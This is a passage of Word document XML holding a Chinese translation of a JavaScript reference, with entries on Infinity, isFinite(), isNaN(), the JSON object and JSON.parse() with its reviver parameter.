      <w:r>
        <w:t>for(var name in this){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>variables+=name+"\n";</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第四部分的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>；第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="674" w:name="Infinity"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Infinity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="674"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表示无穷大的数值属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局属性，用来存放表示正无穷大的特殊数值。用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环不可枚举</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>属性，用</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符也无法删除它。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>不是常量，它可以设置为任意值，有时你得特别留意这一点。（然而</w:t>
      </w:r>
      <w:r>
        <w:t>Number.POSITIVE_INFINITY</w:t>
      </w:r>
      <w:r>
        <w:t>是常量。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>isFinite()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.POSITIVE_INFINITY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="675" w:name="isFinite__"/>
      <w:r>
        <w:t>isFinite()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="675"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>判断数值是否有限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>isFinite(n)</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n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要检测的数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>是有限数（或者可以转换成有限数），那么返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>（非数值）或是正</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>负无穷大，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</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Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.NaN</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.NEGTIVE_INFINITY</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.POSITIVE_INFINITY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="676" w:name="isNaN__"/>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="676"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>检查是否非数值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>isNaN(x)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lastRenderedPageBreak/>
        <w:t>要检测的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>不是数值，或者是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>这个特殊数值时，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是其他任何数值，则返回</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"NaN"</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>"not-a-num</w:t>
      </w:r>
      <w:r>
        <w:t>ber"</w:t>
      </w:r>
      <w:r>
        <w:t>（不是数值）的缩写。全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>保存的是一个特殊数值（即</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>），代表无效数值（比如</w:t>
      </w:r>
      <w:r>
        <w:t>0/0</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>检测其参数是否不是数值。如果</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是数值，或者可以转换为数值，但不是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。如何</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>不是数值，或者不可转换为数值，或者等于</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>有一个独特的特性：它不等于任何值，也不等于自己。因此，如果想专门测试一个值是不是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>（不是普通意义上的非数值），不要使用</w:t>
      </w:r>
      <w:r>
        <w:t>x===NaN</w:t>
      </w:r>
      <w:r>
        <w:t>：这会永远为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。而应该使用</w:t>
      </w:r>
      <w:r>
        <w:t>x!==x</w:t>
      </w:r>
      <w:r>
        <w:t>：只有当</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>时，该表达式才为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>的常见场景是用来检测</w:t>
      </w:r>
      <w:r>
        <w:t>parseFloat()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>的结果，以判断它们是否为有效数值。</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isNaN(0);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>isNaN(0/0);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>isNaN(parseInt("3"));//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>isNaN(parseInt("hello"));//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>isNaN("3");//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>isNaN("hello");//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>isNaN(true);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>isNaN(undefined);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</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isFinite()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number.NaN</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>parseFloat()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="677" w:name="JSON"/>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:bookmarkEnd w:id="677"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>解析与字符串化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>是一个简单对象，用做</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中全局函数</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>的命名空间。</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>不是构造函数。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>之前，</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>解析与序列化函数的兼容版本可以从这里下载：</w:t>
      </w:r>
      <w:r>
        <w:t>http://json.org/json2.js</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"JSON"</w:t>
      </w:r>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript Object Notation</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象标记）。</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>是一种数据序列化格式，基于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的直接量，可以表示</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>值、布尔值</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>、浮点数（使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数值直接量）、字符串（使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串直接量）、数组值（使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组直接量语法）以及字符串到值的映射（使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象直接量语法）。</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>里不能表示原始值</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>、数值</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScri</w:t>
      </w:r>
      <w:r>
        <w:t>pt</w:t>
      </w:r>
      <w:r>
        <w:t>函数、日期、正则表达式和异常错误在</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>中也不支持。</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深拷贝可被</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>序列化的对象或数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function deepcopy(o){return JSON.parse(JSON.stringify(o));}</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JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.9</w:t>
      </w:r>
      <w:r>
        <w:t>节、</w:t>
      </w:r>
      <w:r>
        <w:t>http://json.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="678" w:name="JSON_parse__"/>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="678"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解析</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>格式的字符串</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JSON.parse(s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON.parse(s,reviver)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要解析的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>reviver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用来转换解析值的可选函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个对象、数组或原始值。该返回值从是</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>中解析的（有可能还被</w:t>
      </w:r>
      <w:r>
        <w:t>reviver</w:t>
      </w:r>
      <w:r>
        <w:t>修改过）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个全局函数，用来解析</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>格式的字符串。通常，会传入一个字符串参数，</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>则返回该字符串参数表示的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可以使用可选参数</w:t>
      </w:r>
      <w:r>
        <w:t>reviver</w:t>
      </w:r>
      <w:r>
        <w:t>，在返回解析值前，对其进行过滤或后期处理。如果指定了</w:t>
      </w:r>
      <w:r>
        <w:t>reviver</w:t>
      </w:r>
      <w:r>
        <w:t>函数，该函数会为从</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>中解析的每一个原始值（不是包含这些原始值的对象或数组）调用一次。调用</w:t>
      </w:r>
      <w:r>
        <w:t>reviver</w:t>
      </w:r>
      <w:r>
        <w:t>时带有两个参数。第一个参数是属性名</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性名或转换成字符串的数组序号。第二个参数是对象属性或数组元素的原始值。</w:t>
      </w:r>
      <w:r>
        <w:t>reviver</w:t>
      </w:r>
      <w:r>
        <w:t>会作为包含原始值的对象或数组的方法来调用。在特殊情况下，如果字符串</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>表示的是原始值而不是更常见的对象或数组时，那么该原始值会存放在一个新创建对象的属性中，属性名是空字符串。在这种情况下</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>reviver</w:t>
      </w:r>
      <w:r>
        <w:t>会在这个新创建的对象上调用一次，第一个参数是空字符串，第二个参数则是该原始值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>reviver</w:t>
      </w:r>
      <w:r>
        <w:t>函数的返回值会成为属性的新值。如果</w:t>
      </w:r>
      <w:r>
        <w:t>reviver</w:t>
      </w:r>
      <w:r>
        <w:t>返回第二个参数，而该属性保持不变。如果</w:t>
      </w:r>
      <w:r>
        <w:t>reviver</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>（或根本没有返回任何值），则会从对象或数组中删除该属性，处理完后才会由</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>返回给用户。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
